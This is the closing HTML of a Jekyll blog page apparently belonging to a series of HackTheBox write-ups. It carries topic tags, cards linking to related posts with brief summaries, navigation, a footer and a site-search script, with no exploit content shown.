    <div class="d-flex flex-wrap mt-3 mb-1 mr-3"><a class="post-tag" href="/tags/hackthebox/">hackthebox</a><a class="post-tag" href="/tags/linux/">linux</a><a class="post-tag" href="/tags/web/">web</a><a class="post-tag" href="/tags/static-analysis/">static analysis</a><a class="post-tag" href="/tags/command-injection/">command injection</a><a class="post-tag" href="/tags/custom-exploitation/">custom exploitation</a><a class="post-tag" href="/tags/dvwa/">dvwa</a><a class="post-tag" href="/tags/lfi/">lfi</a><a class="post-tag" href="/tags/python/">python</a><a class="post-tag" href="/tags/rce/">rce</a></div>
  </div>-->
    </div><!-- BS-toc.js will be loaded at medium priority -->
<script src="/assets/js/bootstrap-toc.min.js"></script>

<div id="toc-wrapper" class="pl-0 pr-4 mb-5">
  <div class="panel-heading pl-3 pt-2 mb-2">Contents</div>
  <nav id="toc" data-toggle="toc"></nav>
</div></div>

</div>

<!-- tail --><div class="row">
  <div class="col-12 col-lg-11 col-xl-8">
    <div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.
-->

<!-- The total size of related posts  --><!-- An random integer that bigger than 0  --><!-- Equals to TAG_SCORE / {max_categories_hierarchy}  --><!-- Fill with the other newlest posts  --><div id="related-posts" class="mt-5 mb-2 mb-sm-4">
    <h3 class="pt-2 mt-1 mb-4 ml-1"
      data-toc-skip>Further Reading</h3>
    <div class="card-deck mb-4"><div class="card">
        <a href="/posts/hackthebox/catch.html">
          <div class="card-body"><!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
--><em class="timeagosmall"
    date="2022-08-16 00:00:00 +0100">Aug 16, 2022</em>
<h3 class="pt-0 mt-1 mb-3" data-toc-skip>Catch - HackTheBox</h3>
            <div class="text-muted small">
              <p>Catch is a very interesting medium-rated linux box on HackTheBox. It starts with some light reversing of an android application to obtain an access token for the Let’s Chat API running on the host....
              </p>
            </div>
          </div>
        </a>
      </div><div class="card">
        <a href="/posts/hackthebox/cyberapoc_23.html">
          <div class="card-body"><!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
--><em class="timeagosmall"
    date="2023-03-23 00:00:00 +0100">Mar 23</em>
<h3 class="pt-0 mt-1 mb-3" data-toc-skip>Cyber Apocalypse 2023 - HackTheBox</h3>
            <div class="text-muted small">
              <p>Cyber Apocalypse 2023 is a very nice jeopardy-style CTF competition hosted by HackTheBox. It was a 5-day CTF played between 19th - 23rd March, 2023. This is a write-up on some of the challenges tha...
              </p>
            </div>
          </div>
        </a>
      </div><div class="card">
        <a href="/posts/hackthebox/agile.html">
          <div class="card-body"><!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
--><em class="timeagosmall"
    date="2023-08-05 00:00:00 +0100">Aug  5</em>
<h3 class="pt-0 mt-1 mb-3" data-toc-skip>Agile - HackTheBox</h3>
            <div class="text-muted small">
              <p>Agile is a medium linux box by 0xdf featuring a simple web-based LFI that could be used to bypass PIN validation in the Werkzeug debug console. Once on the box, you’ll recover some creds from a MyS...
              </p>
            </div>
          </div>
        </a>
      </div></div> <!-- .card-deck -->
  </div> <!-- #related-posts --><!--
  Navigation buttons at the bottom of the post.
-->

<div class="post-navigation d-flex justify-content-between"><a href="/posts/hackthebox/agile.html" class="btn btn-outline-primary"
    prompt="Older">
    <p>Agile - HackTheBox</p>
  </a><a href="/posts/hackthebox/only4you.html" class="btn btn-outline-primary"
    prompt="Newer">
    <p>OnlyForYou - HackTheBox</p>
  </a></div>
<!--  The comments switcher --></div>
  </div>
</div> <!-- .row --><!--
  The Footer
-->

<footer class="d-flex w-100 justify-content-center">
  <div class="d-flex justify-content-between align-items-center text-muted">
    <div class="footer-left">
      <p class="mb-0">
        © 2023
        <a href="https://twitter.com/UmarAbdoul">Umar Abdul</a>.<span data-toggle="tooltip" data-placement="top"
          title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p>
    </div>

    <div class="footer-right">
      <p class="mb-0">Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.

      </p>
    </div>

  </div> <!-- div.d-flex -->
</footer>
</div><!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-sm-11 post-content">
    <div id="search-hints"><div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3"><a class="post-tag" href="/tags/hackthebox/">hackthebox</a><a class="post-tag" href="/tags/linux/">linux</a><a class="post-tag" href="/tags/web/">web</a><a class="post-tag" href="/tags/static-analysis/">static analysis</a><a class="post-tag" href="/tags/command-injection/">command injection</a><a class="post-tag" href="/tags/custom-exploitation/">custom exploitation</a><a class="post-tag" href="/tags/dvwa/">dvwa</a><a class="post-tag" href="/tags/lfi/">lfi</a><a class="post-tag" href="/tags/python/">python</a><a class="post-tag" href="/tags/rce/">rce</a></div>
  </div></div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>
</div> <!-- #main-wrapper --><div id="mask"></div>

    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a><!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
--><script src="/assets/js/simple-jekyll-search.min.js"></script>

<script>
SimpleJekyllSearch({
  searchInput: document.getElementById('search-input'),
  resultsContainer: document.getElementById('search-results'),
  json: '/assets/js/data/search.json',
  searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0">  <a href="{url}">{title}</a>  <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">    {categories}    {tags}  </div>  <p>{snippet}</p></div>',
  noResultsText: '<p class="mt-5">Oops! No result founds.</p>',
  templateMiddleware: function(prop, value, template) {
    if (prop === 'categories') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
      }
    }

    if (prop === 'tags') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
      }
    }
  }
});
</script>
<!--
  JS selector for site.
-->

<!-- layout specified --><!-- image lazy-loading & popup -->
  <script src="/assets/js/clipboard.min.js"></script><script defer src="/assets/js/dist/post.min.js"></script><!-- commons -->

<script src="/assets/js/bootstrap.min.js"></script></body>

</html>
